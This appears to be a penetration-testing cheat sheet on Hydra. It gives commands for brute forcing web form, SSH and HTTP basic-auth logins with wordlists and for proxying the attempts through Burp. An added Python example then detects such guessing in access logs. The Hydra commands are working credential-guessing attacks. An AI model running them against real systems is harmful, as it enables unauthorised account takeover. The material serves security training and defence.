Hydra Brute Forcing

Brute forcing web form login

hydra -l john -P rockyou.txt 192.168.133.148 http-post-form "/checklogin.php:username=^USER^&password=^PASS^&Login=Login:F=Wrong Username or Password" -V

Brute forcing protocol login

hydra -L <login list> -P <password list> <protocol>://<ip>

E.g.

hydra -L users.txt -P creds.txt ssh://10.10.10.7

-l    Login name
-L    Login list
-p    Password
-P    Password list

Brute Force Basic Auth

The -C wordlist holds one colon-separated pair per line:

<username>:<password>

GET

hydra -C <wordlist> -s <port> <ip> http-get <URI>

e.g.

hydra -C /usr/share/wordlists/hack/hacklist.txt -s 8080 10.10.10.95 http-get /manager/html

Intercept with Burp

HYDRA_PROXY_HTTP=127.0.0.1:8080 hydra <params>

- Filter out 4xx responses in Burp to see only the successful login attempts.
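The same 4xx-versus-success split is what a defender looks for in the server's access log: a run of 401 responses for one path from one client, followed by a 2xx. The detector below is an added example, not part of the original page; the log lines are constructed Common Log Format samples, and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log (Common Log Format); not real traffic.
REQ = '"GET /manager/html HTTP/1.1"'
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 - - [22/Feb/2020:10:00:{s:02d} +0000] {REQ} 401 2473'
     for s in range(1, 7)]
    + [f'10.0.0.5 - - [22/Feb/2020:10:00:07 +0000] {REQ} 200 19689',
       # A second client that mistypes once and then logs in normally.
       f'10.0.0.9 - - [22/Feb/2020:10:01:00 +0000] {REQ} 401 2473',
       f'10.0.0.9 - - [22/Feb/2020:10:01:05 +0000] {REQ} 200 19689']
)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_guessing(log_text, threshold=5):
    """Flag (client, path) pairs with at least `threshold` 401 responses.

    Each finding carries the 401 count and the timestamp of the first 2xx
    seen for that pair once the threshold was reached (None if there was
    none), i.e. a guess that probably succeeded.
    """
    failures = defaultdict(int)
    succeeded = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        key = (m["ip"], m["path"])
        status = int(m["status"])
        if status == 401:
            failures[key] += 1
        elif 200 <= status < 300 and failures.get(key, 0) >= threshold:
            succeeded.setdefault(key, m["ts"])
    return [
        {"ip": ip, "path": path, "failed": n,
         "success_at": succeeded.get((ip, path))}
        for (ip, path), n in sorted(failures.items())
        if n >= threshold
    ]

if __name__ == "__main__":
    for finding in find_guessing(SAMPLE_LOG):
        print(finding)
```

A finding with a non-empty success_at is the one to escalate first: the credentials that ended the run should be rotated and the session that followed reviewed.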

https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
